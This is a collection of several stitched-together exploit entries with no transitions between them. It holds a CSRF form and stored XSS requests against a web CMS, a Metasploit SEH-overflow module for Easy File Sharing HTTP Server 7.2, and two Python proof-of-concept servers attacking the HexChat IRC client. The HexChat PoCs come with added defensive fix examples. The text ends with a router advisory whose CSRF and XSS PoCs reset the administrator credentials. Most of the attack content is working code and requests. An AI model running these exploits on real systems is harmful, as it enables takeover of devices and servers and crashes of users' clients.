<input type="hidden" name="usergroups" value="Account Managers" />
<input type="hidden" name="usergroups" value="Company Bloggers" />
<input type="hidden" name="usergroups" value="Customer" />
<input type="hidden" name="usergroups" value="Event Managers" />
<input type="hidden" name="usergroups" value="Financial Officers" />
<input type="hidden" name="usergroups" value="Forum Moderator" />
<input type="hidden" name="usergroups" value="Human Resources" />
<input type="hidden" name="usergroups" value="Intranet Managers" />
<input type="hidden" name="usergroups" value="Intranet Users" />
<input type="hidden" name="usergroups" value="Newsletter" />
<input type="hidden" name="usergroups" value="Press Officers" />
<input type="hidden" name="usergroups" value="Product Managers" />
<input type="hidden" name="usergroups" value="Registered Users" />
<input type="hidden" name="usergroups" value="Shop Managers" />
<input type="hidden" name="usergroups" value="Subscribers" />
<input type="hidden" name="usergroups" value="Support Ticket Administrators" />
<input type="hidden" name="usergroups" value="Support Ticket Users" />
<input type="hidden" name="usergroups" value="User Managers" />
<input type="hidden" name="usergroups" value="Website Administrators" />
<input type="hidden" name="usergroups" value="Website Developers" />
<input type="hidden" name="users_group" value="" />
<input type="hidden" name="users_type" value="" />
<input type="hidden" name="creators_group" value="" />
<input type="hidden" name="creators_type" value="" />
<input type="hidden" name="editors_group" value="" />
<input type="hidden" name="editors_type" value="" />
<input type="hidden" name="publishers_group" value="" />
<input type="hidden" name="publishers_type" value="" />
<input type="hidden" name="administrators_group" value="" />
<input type="hidden" name="administrators_type" value="" />
<input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
<input type="hidden" name="scheduled_publish_email" value="" />
<input type="hidden" name="scheduled_notify" value="" />
<input type="hidden" name="scheduled_notify_email" value="" />
<input type="hidden" name="scheduled_unpublish" value="" />
<input type="hidden" name="scheduled_unpublish_email" value="" />
<input type="hidden" name="invoice_name" value="Icebreaker" />
<input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
<input type="hidden" name="invoice_address" value="nu" />
<input type="hidden" name="invoice_postalcode" value="1300" />
<input type="hidden" name="invoice_city" value="Neverland" />
<input type="hidden" name="invoice_state" value="ND" />
<input type="hidden" name="invoice_country" value="ND" />
<input type="hidden" name="invoice_phone" value="111-222-3333" />
<input type="hidden" name="invoice_fax" value="" />
<input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
<input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
<input type="hidden" name="delivery_name" value="" />
<input type="hidden" name="delivery_organisation" value="" />
<input type="hidden" name="delivery_address" value="" />
<input type="hidden" name="delivery_postalcode" value="" />
<input type="hidden" name="delivery_city" value="" />
<input type="hidden" name="delivery_state" value="" />
<input type="hidden" name="delivery_country" value="" />
<input type="hidden" name="delivery_phone" value="" />
<input type="hidden" name="delivery_fax" value="" />
<input type="hidden" name="delivery_email" value="" />
<input type="hidden" name="delivery_website" value="" />
<input type="hidden" name="card_type" value="VISA" />
<input type="hidden" name="card_number" value="4444333322221111" />
<input type="hidden" name="card_issuedmonth" value="01" />
<input type="hidden" name="card_issuedyear" value="2016" />
<input type="hidden" name="card_expirymonth" value="01" />
<input type="hidden" name="card_expiryyear" value="2100" />
<input type="hidden" name="card_name" value="Hacker Hackerowsky" />
<input type="hidden" name="card_cvc" value="133" />
<input type="hidden" name="card_issue" value="" />
<input type="hidden" name="card_postalcode" value="1300" />
<input type="hidden" name="content_editor" value="" />
<input type="hidden" name="hardcore_upload" value="" />
<input type="hidden" name="hardcore_format" value="" />
<input type="hidden" name="hardcore_width" value="" />
<input type="hidden" name="hardcore_height" value="" />
<input type="hidden" name="hardcore_onenter" value="" />
<input type="hidden" name="hardcore_onctrlenter" value="" />
<input type="hidden" name="hardcore_onshiftenter" value="" />
<input type="hidden" name="hardcore_onaltenter" value="" />
<input type="hidden" name="hardcore_toolbar1" value="" />
<input type="hidden" name="hardcore_toolbar2" value="" />
<input type="hidden" name="hardcore_toolbar3" value="" />
<input type="hidden" name="hardcore_toolbar4" value="" />
<input type="hidden" name="hardcore_toolbar5" value="" />
<input type="hidden" name="hardcore_formatblock" value="" />
<input type="hidden" name="hardcore_fontname" value="" />
<input type="hidden" name="hardcore_fontsize" value="" />
<input type="hidden" name="hardcore_customscript" value="" />
<input type="hidden" name="startpage" value="" />
<input type="hidden" name="workspace_sections" value="" />
<input type="hidden" name="index_workspace" value="" />
<input type="hidden" name="index_content" value="" />
<input type="hidden" name="index_library" value="" />
<input type="hidden" name="index_product" value="" />
<input type="hidden" name="index_stock" value="" />
<input type="hidden" name="index_order" value="" />
<input type="hidden" name="index_segments" value="" />
<input type="hidden" name="index_usertests" value="" />
<input type="hidden" name="index_heatmaps" value="" />
<input type="hidden" name="index_user" value="" />
<input type="hidden" name="index_websites" value="" />
<input type="hidden" name="menu_selection" value="" />
<input type="hidden" name="statistics_reports" value="" />
<input type="hidden" name="sales_reports" value="" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
#4
Stored Cross-Site Scripting:
----------------------------
a)
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"
/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"
Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"
2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"
"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml
testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"
image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"
Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"
0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"
------WebKitFormBoundarygqlN2AtccVFqx0YN--
b)
POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7
filenameextension="><script>alert(document.cookie)</script>
Sources:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
https://github.com/sam-b/CVE-2014-4113
EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf
Trigger and exploit code for CVE-2014-4113:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39666.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',
      'Description'    => %q{
        This module exploits a SEH overflow in the Easy File Sharing HTTP Server 7.2 software.
      },
      'Author'         => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '39008' ],
        ],
      'Privileged'     => true,
      # One DefaultOptions hash: a duplicated key in a Ruby hash literal silently
      # drops the earlier entry, which would have discarded EXITFUNC.
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'RPORT'    => 80
        },
      'Payload'        =>
        {
          'Space'           => 390,
          'BadChars'        => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # 'Ret' is the address written over the SEH handler record.
          [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],
        ],
      'DisclosureDate' => 'Dec 2 2015',
      'DefaultTarget'  => 0))
  end

  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def exploit
    connect
    print_status("Sending exploit...")
    sploit = "GET "
    sploit << rand_text_alpha_upper(4061)       # filler up to the SEH record
    sploit << generate_seh_record(target.ret)   # nSEH short jump + overwritten handler
    sploit << make_nops(19)
    sploit << payload.encoded
    sploit << make_nops(7)
    sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)
    sploit << " HTTP/1.0\r\n\r\n"
    sock.put(sploit)
    print_good("Exploit Sent")
    handler
    disconnect
  end
end
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - Server name log directory traversal
# Date: 2016-01-26
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits)
# CVE : CVE-2016-2087
#############################
# Vulnerability description #
#############################
'''
Server Name Directory Traversal in src/common/text.c :
static char * log_create_pathname (char *servname, char *channame, char *netname)
In this function, channame (channel name) and netname (network name as
configured in the client software) are sanitized to prevent directory
traversal issues when creating a logfile BUT servname (server-provided
information) is NOT sanitized before possibly being injected into
the file path via the 'log_insert_vars' function call.
This bug could be triggered in the special (non-default) configuration
where a user would have :
* Enabled logging (Settings > Preferences > Chatting > Logging)
* Used a pattern containing '%s' in the log filepath (instead
of the default = '%n\%c.log').
When connecting to a malicious server, the Hexchat IRC client may create or modify
arbitrary files on the filesystem with the permissions of the IRC client user
(non-root). For example, the following directories are easily reachable:
* <Hexchat-Conf>/addons : Executable plugin files that are automatically loaded
when starting Hexchat IRC client
* <Hexchat-Conf>/logs : ALL logfiles (from other servers too)
* <Hexchat-Conf>/scrollback : Scrollback text that is automatically
loaded when entering a channel/server (this may trigger further bugs)
* <Hexchat-Conf>/sounds : Sounds that may be played on demand via CTCP
SOUND messages (this could also trigger further bugs)
* etc.
CVSS v2 Vector : (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CVSS Base Score : 4
Impact Subscore : 4.9
Exploitability Subscore : 4.9
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Settings > Preferences > Chatting > Logging : Enable logging and use the log
filepath pattern : '%s\%c.log' (without the quotes)
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : A 'PIZZA' directory will appear in <Hexchat-Conf>/PIZZA instead
of something like <Hexchat-Conf>/logs/___PIZZA
'''
import socket

# Exploit configuration
HOST = ''                # listen on all interfaces
PORT = 6667
SERVERNAME = '../PIZZA'  # server name carrying a path traversal sequence

# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.bind((HOST, PORT))  # Bind to port
    sock.listen(0)           # Start listening on socket
    print('Server listening, waiting for connection...')
    conn, addr = sock.accept()
    print('Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...')
    # RPL_WELCOME (001) whose message prefix is the malicious server name;
    # HexChat expands it as %s in the log filename pattern
    conn.send((':' + SERVERNAME + ' 001 bob :Welcome to the Internet Relay Network\r\n').encode())
    # Wait and close socket
    conn.recv(256)
    sock.close()
    print('Done.')
except socket.error as msg:
    print('Failure binding to port : ' + str(msg))
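The fix the description above calls for is to sanitise servname the same way channame and netname already are, and, as defence in depth, to confirm the expanded pattern still resolves under the log directory. The following is an added example of that, written for this page and not HexChat's own code: the character set kept by `sanitize_component` is an assumption chosen so that `../PIZZA` becomes `___PIZZA`, the result the PoC text expects, and the log directory used is a made-up path.

```python
import os
import re

# Anything outside this set is rewritten to '_' (assumed rule; it reproduces the
# '___PIZZA' result described in the PoC above).
_UNSAFE = re.compile(r'[^A-Za-z0-9#_-]')


def sanitize_component(value):
    """Reduce an untrusted name (server, channel or network) to one safe path component."""
    cleaned = _UNSAFE.sub('_', value)
    return cleaned or '_'


def expand_pattern(pattern, servname, channame, netname, sanitize=True):
    """Expand %s/%c/%n in the log filename pattern; sanitize=False mirrors the bug for servname."""
    fix = sanitize_component if sanitize else (lambda v: v)
    expanded = (pattern.replace('%s', fix(servname))
                       .replace('%c', fix(channame))
                       .replace('%n', fix(netname)))
    # HexChat's default pattern uses '\' as the separator; treat it as '/'.
    return expanded.replace('\\', '/')


def is_contained(logdir, relative):
    """True when logdir/relative, after resolving '..' and symlinks, stays inside logdir."""
    base = os.path.realpath(logdir)
    full = os.path.realpath(os.path.join(base, relative))
    return os.path.commonpath([base, full]) == base


def log_create_pathname(logdir, pattern, servname, channame, netname):
    """Sanitised expansion plus a containment check; raises if the result escapes logdir."""
    relative = expand_pattern(pattern, servname, channame, netname)
    if not is_contained(logdir, relative):
        raise ValueError('log path escapes %s: %s' % (logdir, relative))
    return relative


if __name__ == '__main__':
    logdir = '/home/bob/.config/hexchat/logs'   # made-up location
    pattern = r'%s\%c.log'                       # the non-default pattern from the PoC
    unsafe = expand_pattern(pattern, '../PIZZA', '#chan', 'net', sanitize=False)
    print('unsanitised :', unsafe, '-> contained:', is_contained(logdir, unsafe))
    print('sanitised   :', log_create_pathname(logdir, pattern, '../PIZZA', '#chan', 'net'))
    print('default     :', log_create_pathname(logdir, r'%n\%c.log', 'irc.example.com', '#chan', 'FreeNode'))
```

The containment check is what catches the case the sanitiser misses (a future variable that is forgotten, or a pattern edited by hand), which is why both are worth keeping.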
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow
# Date: 2016-02-07
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits)
# CVE : CVE-2016-2233
#############################
# Vulnerability description #
#############################
'''
Stack Buffer Overflow in src/common/inbound.c :
void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data)
In this function, Hexchat IRC client receives the available extensions from
the IRC server (CAP LS message) and constructs the request string to indicate
later which one to use (CAP REQ message).
This request string is stored in the fixed size (256 bytes) byte array
'buffer'. It has enough space for all possible options combined, BUT
it will overflow if some options are repeated.
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : Hexchat will crash (most probably access violation/segmentation fault)
'''
import socket

# Exploit configuration
HOST = ''                        # listen on all interfaces
PORT = 6667
SERVERNAME = 'irc.example.com'
OPTIONS = 'multi-prefix ' * 100  # 13*100 = 1300 bytes > 256 bytes

# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.bind((HOST, PORT))  # Bind to port
    sock.listen(0)           # Start listening on socket
    print('Server listening, waiting for connection...')
    conn, addr = sock.accept()
    print('Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...')
    # CAP LS reply repeating one capability; the client copies every occurrence
    # into its fixed 256-byte CAP REQ buffer
    conn.send((':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n').encode())
    # Wait and close socket
    conn.recv(256)
    sock.close()
    print('Done.')
except socket.error as msg:
    print('Network error : ' + str(msg))
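The overflow described above comes from building CAP REQ by appending one entry per advertised token, so a repeated token grows the request without bound. The example below is added here and is not HexChat's code: it parses a CAP LS line, shows the append-per-token construction next to a version that requests each wanted capability once and bounds the result against the 256-byte size the advisory quotes. The list of wanted capabilities is an assumption for the example, not HexChat's actual list.

```python
BUFFER_SIZE = 256   # size of the fixed CAP REQ buffer, per the advisory above

# Capabilities this client is prepared to negotiate (assumed list for the example).
WANTED_CAPS = ('multi-prefix', 'away-notify', 'account-notify', 'extended-join',
               'userhost-in-names', 'server-time', 'sasl')


def parse_cap_ls(line):
    """Return the capability tokens from ':server CAP * LS :cap1 cap2 ...'."""
    head, sep, trailing = line.rstrip('\r\n').partition(' :')
    if not sep or head.split()[-3:] != ['CAP', '*', 'LS']:
        raise ValueError('not a CAP LS line: %r' % line)
    return trailing.split()


def build_cap_req_vulnerable(offered):
    """The buggy construction: one append per advertised token, repeats included."""
    buf = 'CAP REQ :'
    for cap in offered:
        if cap in WANTED_CAPS:
            buf += cap + ' '
    return buf.rstrip(' ')


def build_cap_req_safe(offered):
    """Request each wanted capability once, in our own order, and bound the length."""
    offered = set(offered)                       # collapses repeated tokens
    wanted = [cap for cap in WANTED_CAPS if cap in offered]
    req = 'CAP REQ :' + ' '.join(wanted)
    if len(req) + 2 > BUFFER_SIZE:               # +2 for the trailing CRLF
        raise ValueError('CAP REQ would exceed %d bytes' % BUFFER_SIZE)
    return req


if __name__ == '__main__':
    # Constructed line matching what the PoC server above sends.
    line = ':irc.example.com CAP * LS :' + 'multi-prefix ' * 100 + '\r\n'
    offered = parse_cap_ls(line)
    print('tokens offered      :', len(offered))
    print('vulnerable req bytes:', len(build_cap_req_vulnerable(offered)))
    print('safe req            :', build_cap_req_safe(offered))
```

Iterating over the client's own fixed list, rather than over whatever the server sent, is the actual fix: the request can then never be longer than the sum of the wanted names, which is the "enough space for all possible options combined" assumption the buffer size was based on. The length check only guards against that list growing later.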
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/
Security Advisory
2016-04-03
www.orwelllabs.com
Twitter:@orwelllabs
magicword: d0ubl3th1nk1ng...
Overview
=======
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: PQI Group
Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and
6W51-0000R2XXX
Credits: Discovered and researched by Orwelllabs
Advisory URL: http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html
Issues
=====
I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352)
II. Multiple Stored Cross-site Scripting (CWE-79)
III. Multiple Reflected Cross-Site Scripting (CWE-79)
IV. Insecure Direct Request
V. Insecure Default Permissions (CWE-276)
VI. No SSL
background
=========
The smart lipstick-shaped PQI Air Pen express is the world's smallest
wireless router/access point combo you can get today.
PQI Air Pen express can be powered via an external adapter or a powered USB
port on your computer and provides an excellent wireless experience for
everyone.
I. Cross-Site Request Forgery (CSRF) (CWE-352)
```````````````````````````````````````````````````````````````````````
If a user visits the page below, the administrative credentials of the PQI Air
Pen express are set to "root:r00t":
<html>
<!-- CSRF PoC -->
<body>
<form action="http://{airpenXweb}/goform/setSysAdm" method="POST">
<input type="hidden" name="admuser" value="root" />
<input type="hidden" name="admpass" value="r00t" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The attacker can also chain the device's multiple XSS issues with this CSRF; the
following request sets the same credentials 'root:r00t' through an injected script:
http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!--
The following PoC sets the 3G dial-up credentials to "3groot:3gr00t"
(and of course any other value could be set the same way):
<html>
<!-- CSRF PoC2 -->
<body>
<form action="http://{airpenXweb}/goform/setWan" method="POST">
<input type="hidden" name="connectionType" value="DHCP" />
<input type="hidden" name="staticIp" value="xxx.xxx.xxx.xxx" />
<input type="hidden" name="staticNetmask" value="255.255.255.0" />
<input type="hidden" name="staticGateway" value="xxx.xxx.xxx.xxx" />
<input type="hidden" name="staticPriDns" value="xxx.xxx.xxx.x" />
<input type="hidden" name="staticSecDns" value="xxx.xxx.xxx.x" />
<input type="hidden" name="hostname" value="" />
<input type="hidden" name="pppoeUser" value="pppoe_user" />
<input type="hidden" name="pppoePass" value="pppoe_passwd" />
<input type="hidden" name="pppoePass2" value="pppoe_passwd" />
<input type="hidden" name="pppoeOPMode" value="KeepAlive" />
<input type="hidden" name="pppoeRedialPeriod" value="60" />
<input type="hidden" name="pppoeIdleTime" value="5" />
<input type="hidden" name="l2tpServer" value="l2tp_server" />
<input type="hidden" name="l2tpUser" value="l2tp_user" />
<input type="hidden" name="l2tpPass" value="l2tp_passwd" />
<input type="hidden" name="l2tpMode" value="0" />
<input type="hidden" name="l2tpIp" value="192.168.1.1" />
<input type="hidden" name="l2tpNetmask" value="255.255.255.0" />
<input type="hidden" name="l2tpGateway" value="192.168.1.254" />
<input type="hidden" name="l2tpOPMode" value="KeepAlive" />
<input type="hidden" name="l2tpRedialPeriod" value="60" />
<input type="hidden" name="pptpServer" value="pptp_server" />
<input type="hidden" name="pptpUser" value="pptp_user" />
<input type="hidden" name="pptpPass" value="pptp_passwd" />
<input type="hidden" name="pptpMode" value="0" />
<input type="hidden" name="pptpIp" value="192.168.1.1" />
<input type="hidden" name="pptpNetmask" value="255.255.255.0" />
<input type="hidden" name="pptpGateway" value="192.168.1.254" />
<input type="hidden" name="pptpOPMode" value="KeepAlive" />
<input type="hidden" name="pptpRedialPeriod" value="60" />
<input type="hidden" name="APN3G" value="" />
<input type="hidden" name="PIN3G" value="" />
<input type="hidden" name="Dial3G" value="" />
<input type="hidden" name="User3G" value="3groot" /> <!-- 3G user -->
<input type="hidden" name="Password3G" value="3gr00t" /> <!-- 3G password -->
<input type="hidden" name="Dev3G" value="Auto" />
<input type="hidden" name="macCloneEnbl" value="0" />
<input type="hidden" name="macCloneMac" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
II. Stored Cross-site Scripting (CWE-79)
``````````````````````````````````````````````````````````
"Wide Area Network (WAN) Settings"
# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[*STOREDXSS*]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=
"Webs URL Filter Settings"
# PocParameter: "addURLFilter"
http://{airpenXweb}/goform/websURLFilter?addURLFilter=[*STOREDXSS*]&addwebsurlfilter=Add
Requesting the following page then renders the stored JavaScript payload in a pop-up:
http://{airpenXweb}/firewall/content_filtering.asp
# Parameter: "addHostFilter"
http://{airpenXweb}/goform/websHostFilter?addHostFilter=[*STOREDXSS*]&addwebscontentfilter=Add
III. Reflected Cross-Site Scripting (CWE-79)
``````````````````````````````````````````````````````````````
Virtually all application inputs are vulnerable to cross-site scripting, since
no validation is performed on user-supplied data.
Some examples are given below:
"Basic Wireless Settings"
# PocParameter: "mssid_0"
http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[*XSS*]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1
# PocParameter: "ssid"
http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[*XSS*]&security_mode=Disable&wzsecureAlgorithm=AES
# PocParameters: "connectionType", "User3G"
